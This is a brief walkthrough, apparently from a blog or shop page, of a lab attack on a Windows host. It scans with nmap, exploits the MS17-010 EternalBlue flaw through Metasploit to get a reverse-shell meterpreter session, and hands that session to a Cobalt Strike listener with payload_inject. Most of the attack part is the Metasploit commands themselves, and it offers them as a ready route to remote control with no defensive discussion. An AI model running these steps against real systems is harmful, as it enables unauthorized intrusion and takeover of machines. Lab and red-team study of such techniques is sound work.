MSF and CobaltStrike linkage

Category: Tags: ,

0x00 Environment Introduction
Attacker: (kali)

Victim machine:


Tools: nmap, metaspolit, cobaltstrike

0x01 attack preparation
First deploy the victim host to modulate the network card to communicate with each other.

Next, deploy the web application service, which looks like a real application server.

0x02 pre-attack stage
Through the use of nmap information collection and discovery of open ports 445, 3389 and operating system version information.

nmap -A

Through information collection, it was discovered that the system opened port 445, and tools were used to detect whether there is a ms17_010 vulnerability, and it was found.


First open msf to exploit the vulnerability

1. Search and exploit modules

search ms17_010

2. Exploitation of vulnerabilities

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp

Get session

Enter the meterpreter session.

Then use Cobaltstrike to play

If you think the functions are too few, you can also link with Cobaltstrike

Start Cobaltstrike

Now get a MSF meterpreter type session, and the session id is 1.

Create a new monitor in Cobaltstrike and configure it as follows:

Set as follows in MSF:

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost
set lport 12388
set session 1


In this way, you can see that you have obtained the MSF bounced Meterpreter session in Cobaltstrike.

Finally, the penetration module integrated in Cobaltstrike can be used for further testing.

Note: Only the session of Meterpreter type can be derived from Cobaltstrike.

0x03 summary thinking
The collection of detailed information in the testing process means different penetration testing routes, and only the associated use and reuse of information can more effectively amplify the penetration results.


There are no reviews yet.

Be the first to review “MSF and CobaltStrike linkage”

Your email address will not be published. Required fields are marked *